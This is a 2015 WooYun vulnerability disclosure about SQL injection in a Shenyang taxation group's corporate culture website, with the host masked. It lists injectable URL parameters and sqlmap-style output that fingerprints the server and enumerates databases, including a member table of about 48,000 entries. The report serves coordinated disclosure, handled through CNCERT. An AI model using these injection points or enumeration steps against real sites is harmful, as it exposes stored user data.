Vulnerability summary

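Bug ID: wooyun-2015-0144899

Title: Multiple SQL injection vulnerabilities in the Shenyang Taxation Group (沈阳税务集团) corporate culture website (bundled report)

Vendor: CNCERT (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-10-09 22:39

Fixed: 2015-11-28 08:48

Published: 2015-11-28 08:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]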


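Vulnerability details

Disclosure status:

2015-10-09: Details reported to the vendor; awaiting vendor action
2015-10-14: Vendor confirmed; details disclosed to the vendor only
2015-10-24: Details disclosed to core white hats and experts in related fields
2015-11-03: Details disclosed to regular white hats
2015-11-13: Details disclosed to intern white hats
2015-11-28: Details disclosed to the public

Brief description:

Detailed description: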

http://**.**.**.**/news/detail.php?newsID=25
http://**.**.**.**/tv/tv_list.php?cat=2
http://**.**.**.**/news/list.php?cat=1
http://**.**.**.**/magazine/maga_list.php?cat=1
http://**.**.**.**/news/tlist.php?type=2
http://**.**.**.**/photo/?id=340
http://**.**.**.**/tv/tv_detail.php?vid=154
http://**.**.**.**/photo/slider_photo.php?id=340
[15:39:53] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[15:39:53] [INFO] fetching database names
[15:39:53] [INFO] the SQL query used returns 2 entries
[15:39:53] [INFO] resumed: "information_schema"
[15:39:53] [INFO] resumed: "wwwswdsdcom"
available databases [2]:
[*] information_schema
[*] wwwswdsdcom

Proof of vulnerability:

Database: wwwswdsdcom
[216 tables]
back-end DBMS: MySQL 5.0.11
Database: wwwswdsdcom
+-------------+---------+
| Table | Entries |
+-------------+---------+
| cdb_members | 48572 |
+-------------+---------+


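Remediation:

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-10-14 08:46

Vendor reply:

CNVD has confirmed the situation described and has forwarded it via CNCERT to the Liaoning branch center, which will follow up and coordinate with the organization managing the website to handle it.

Latest status:

None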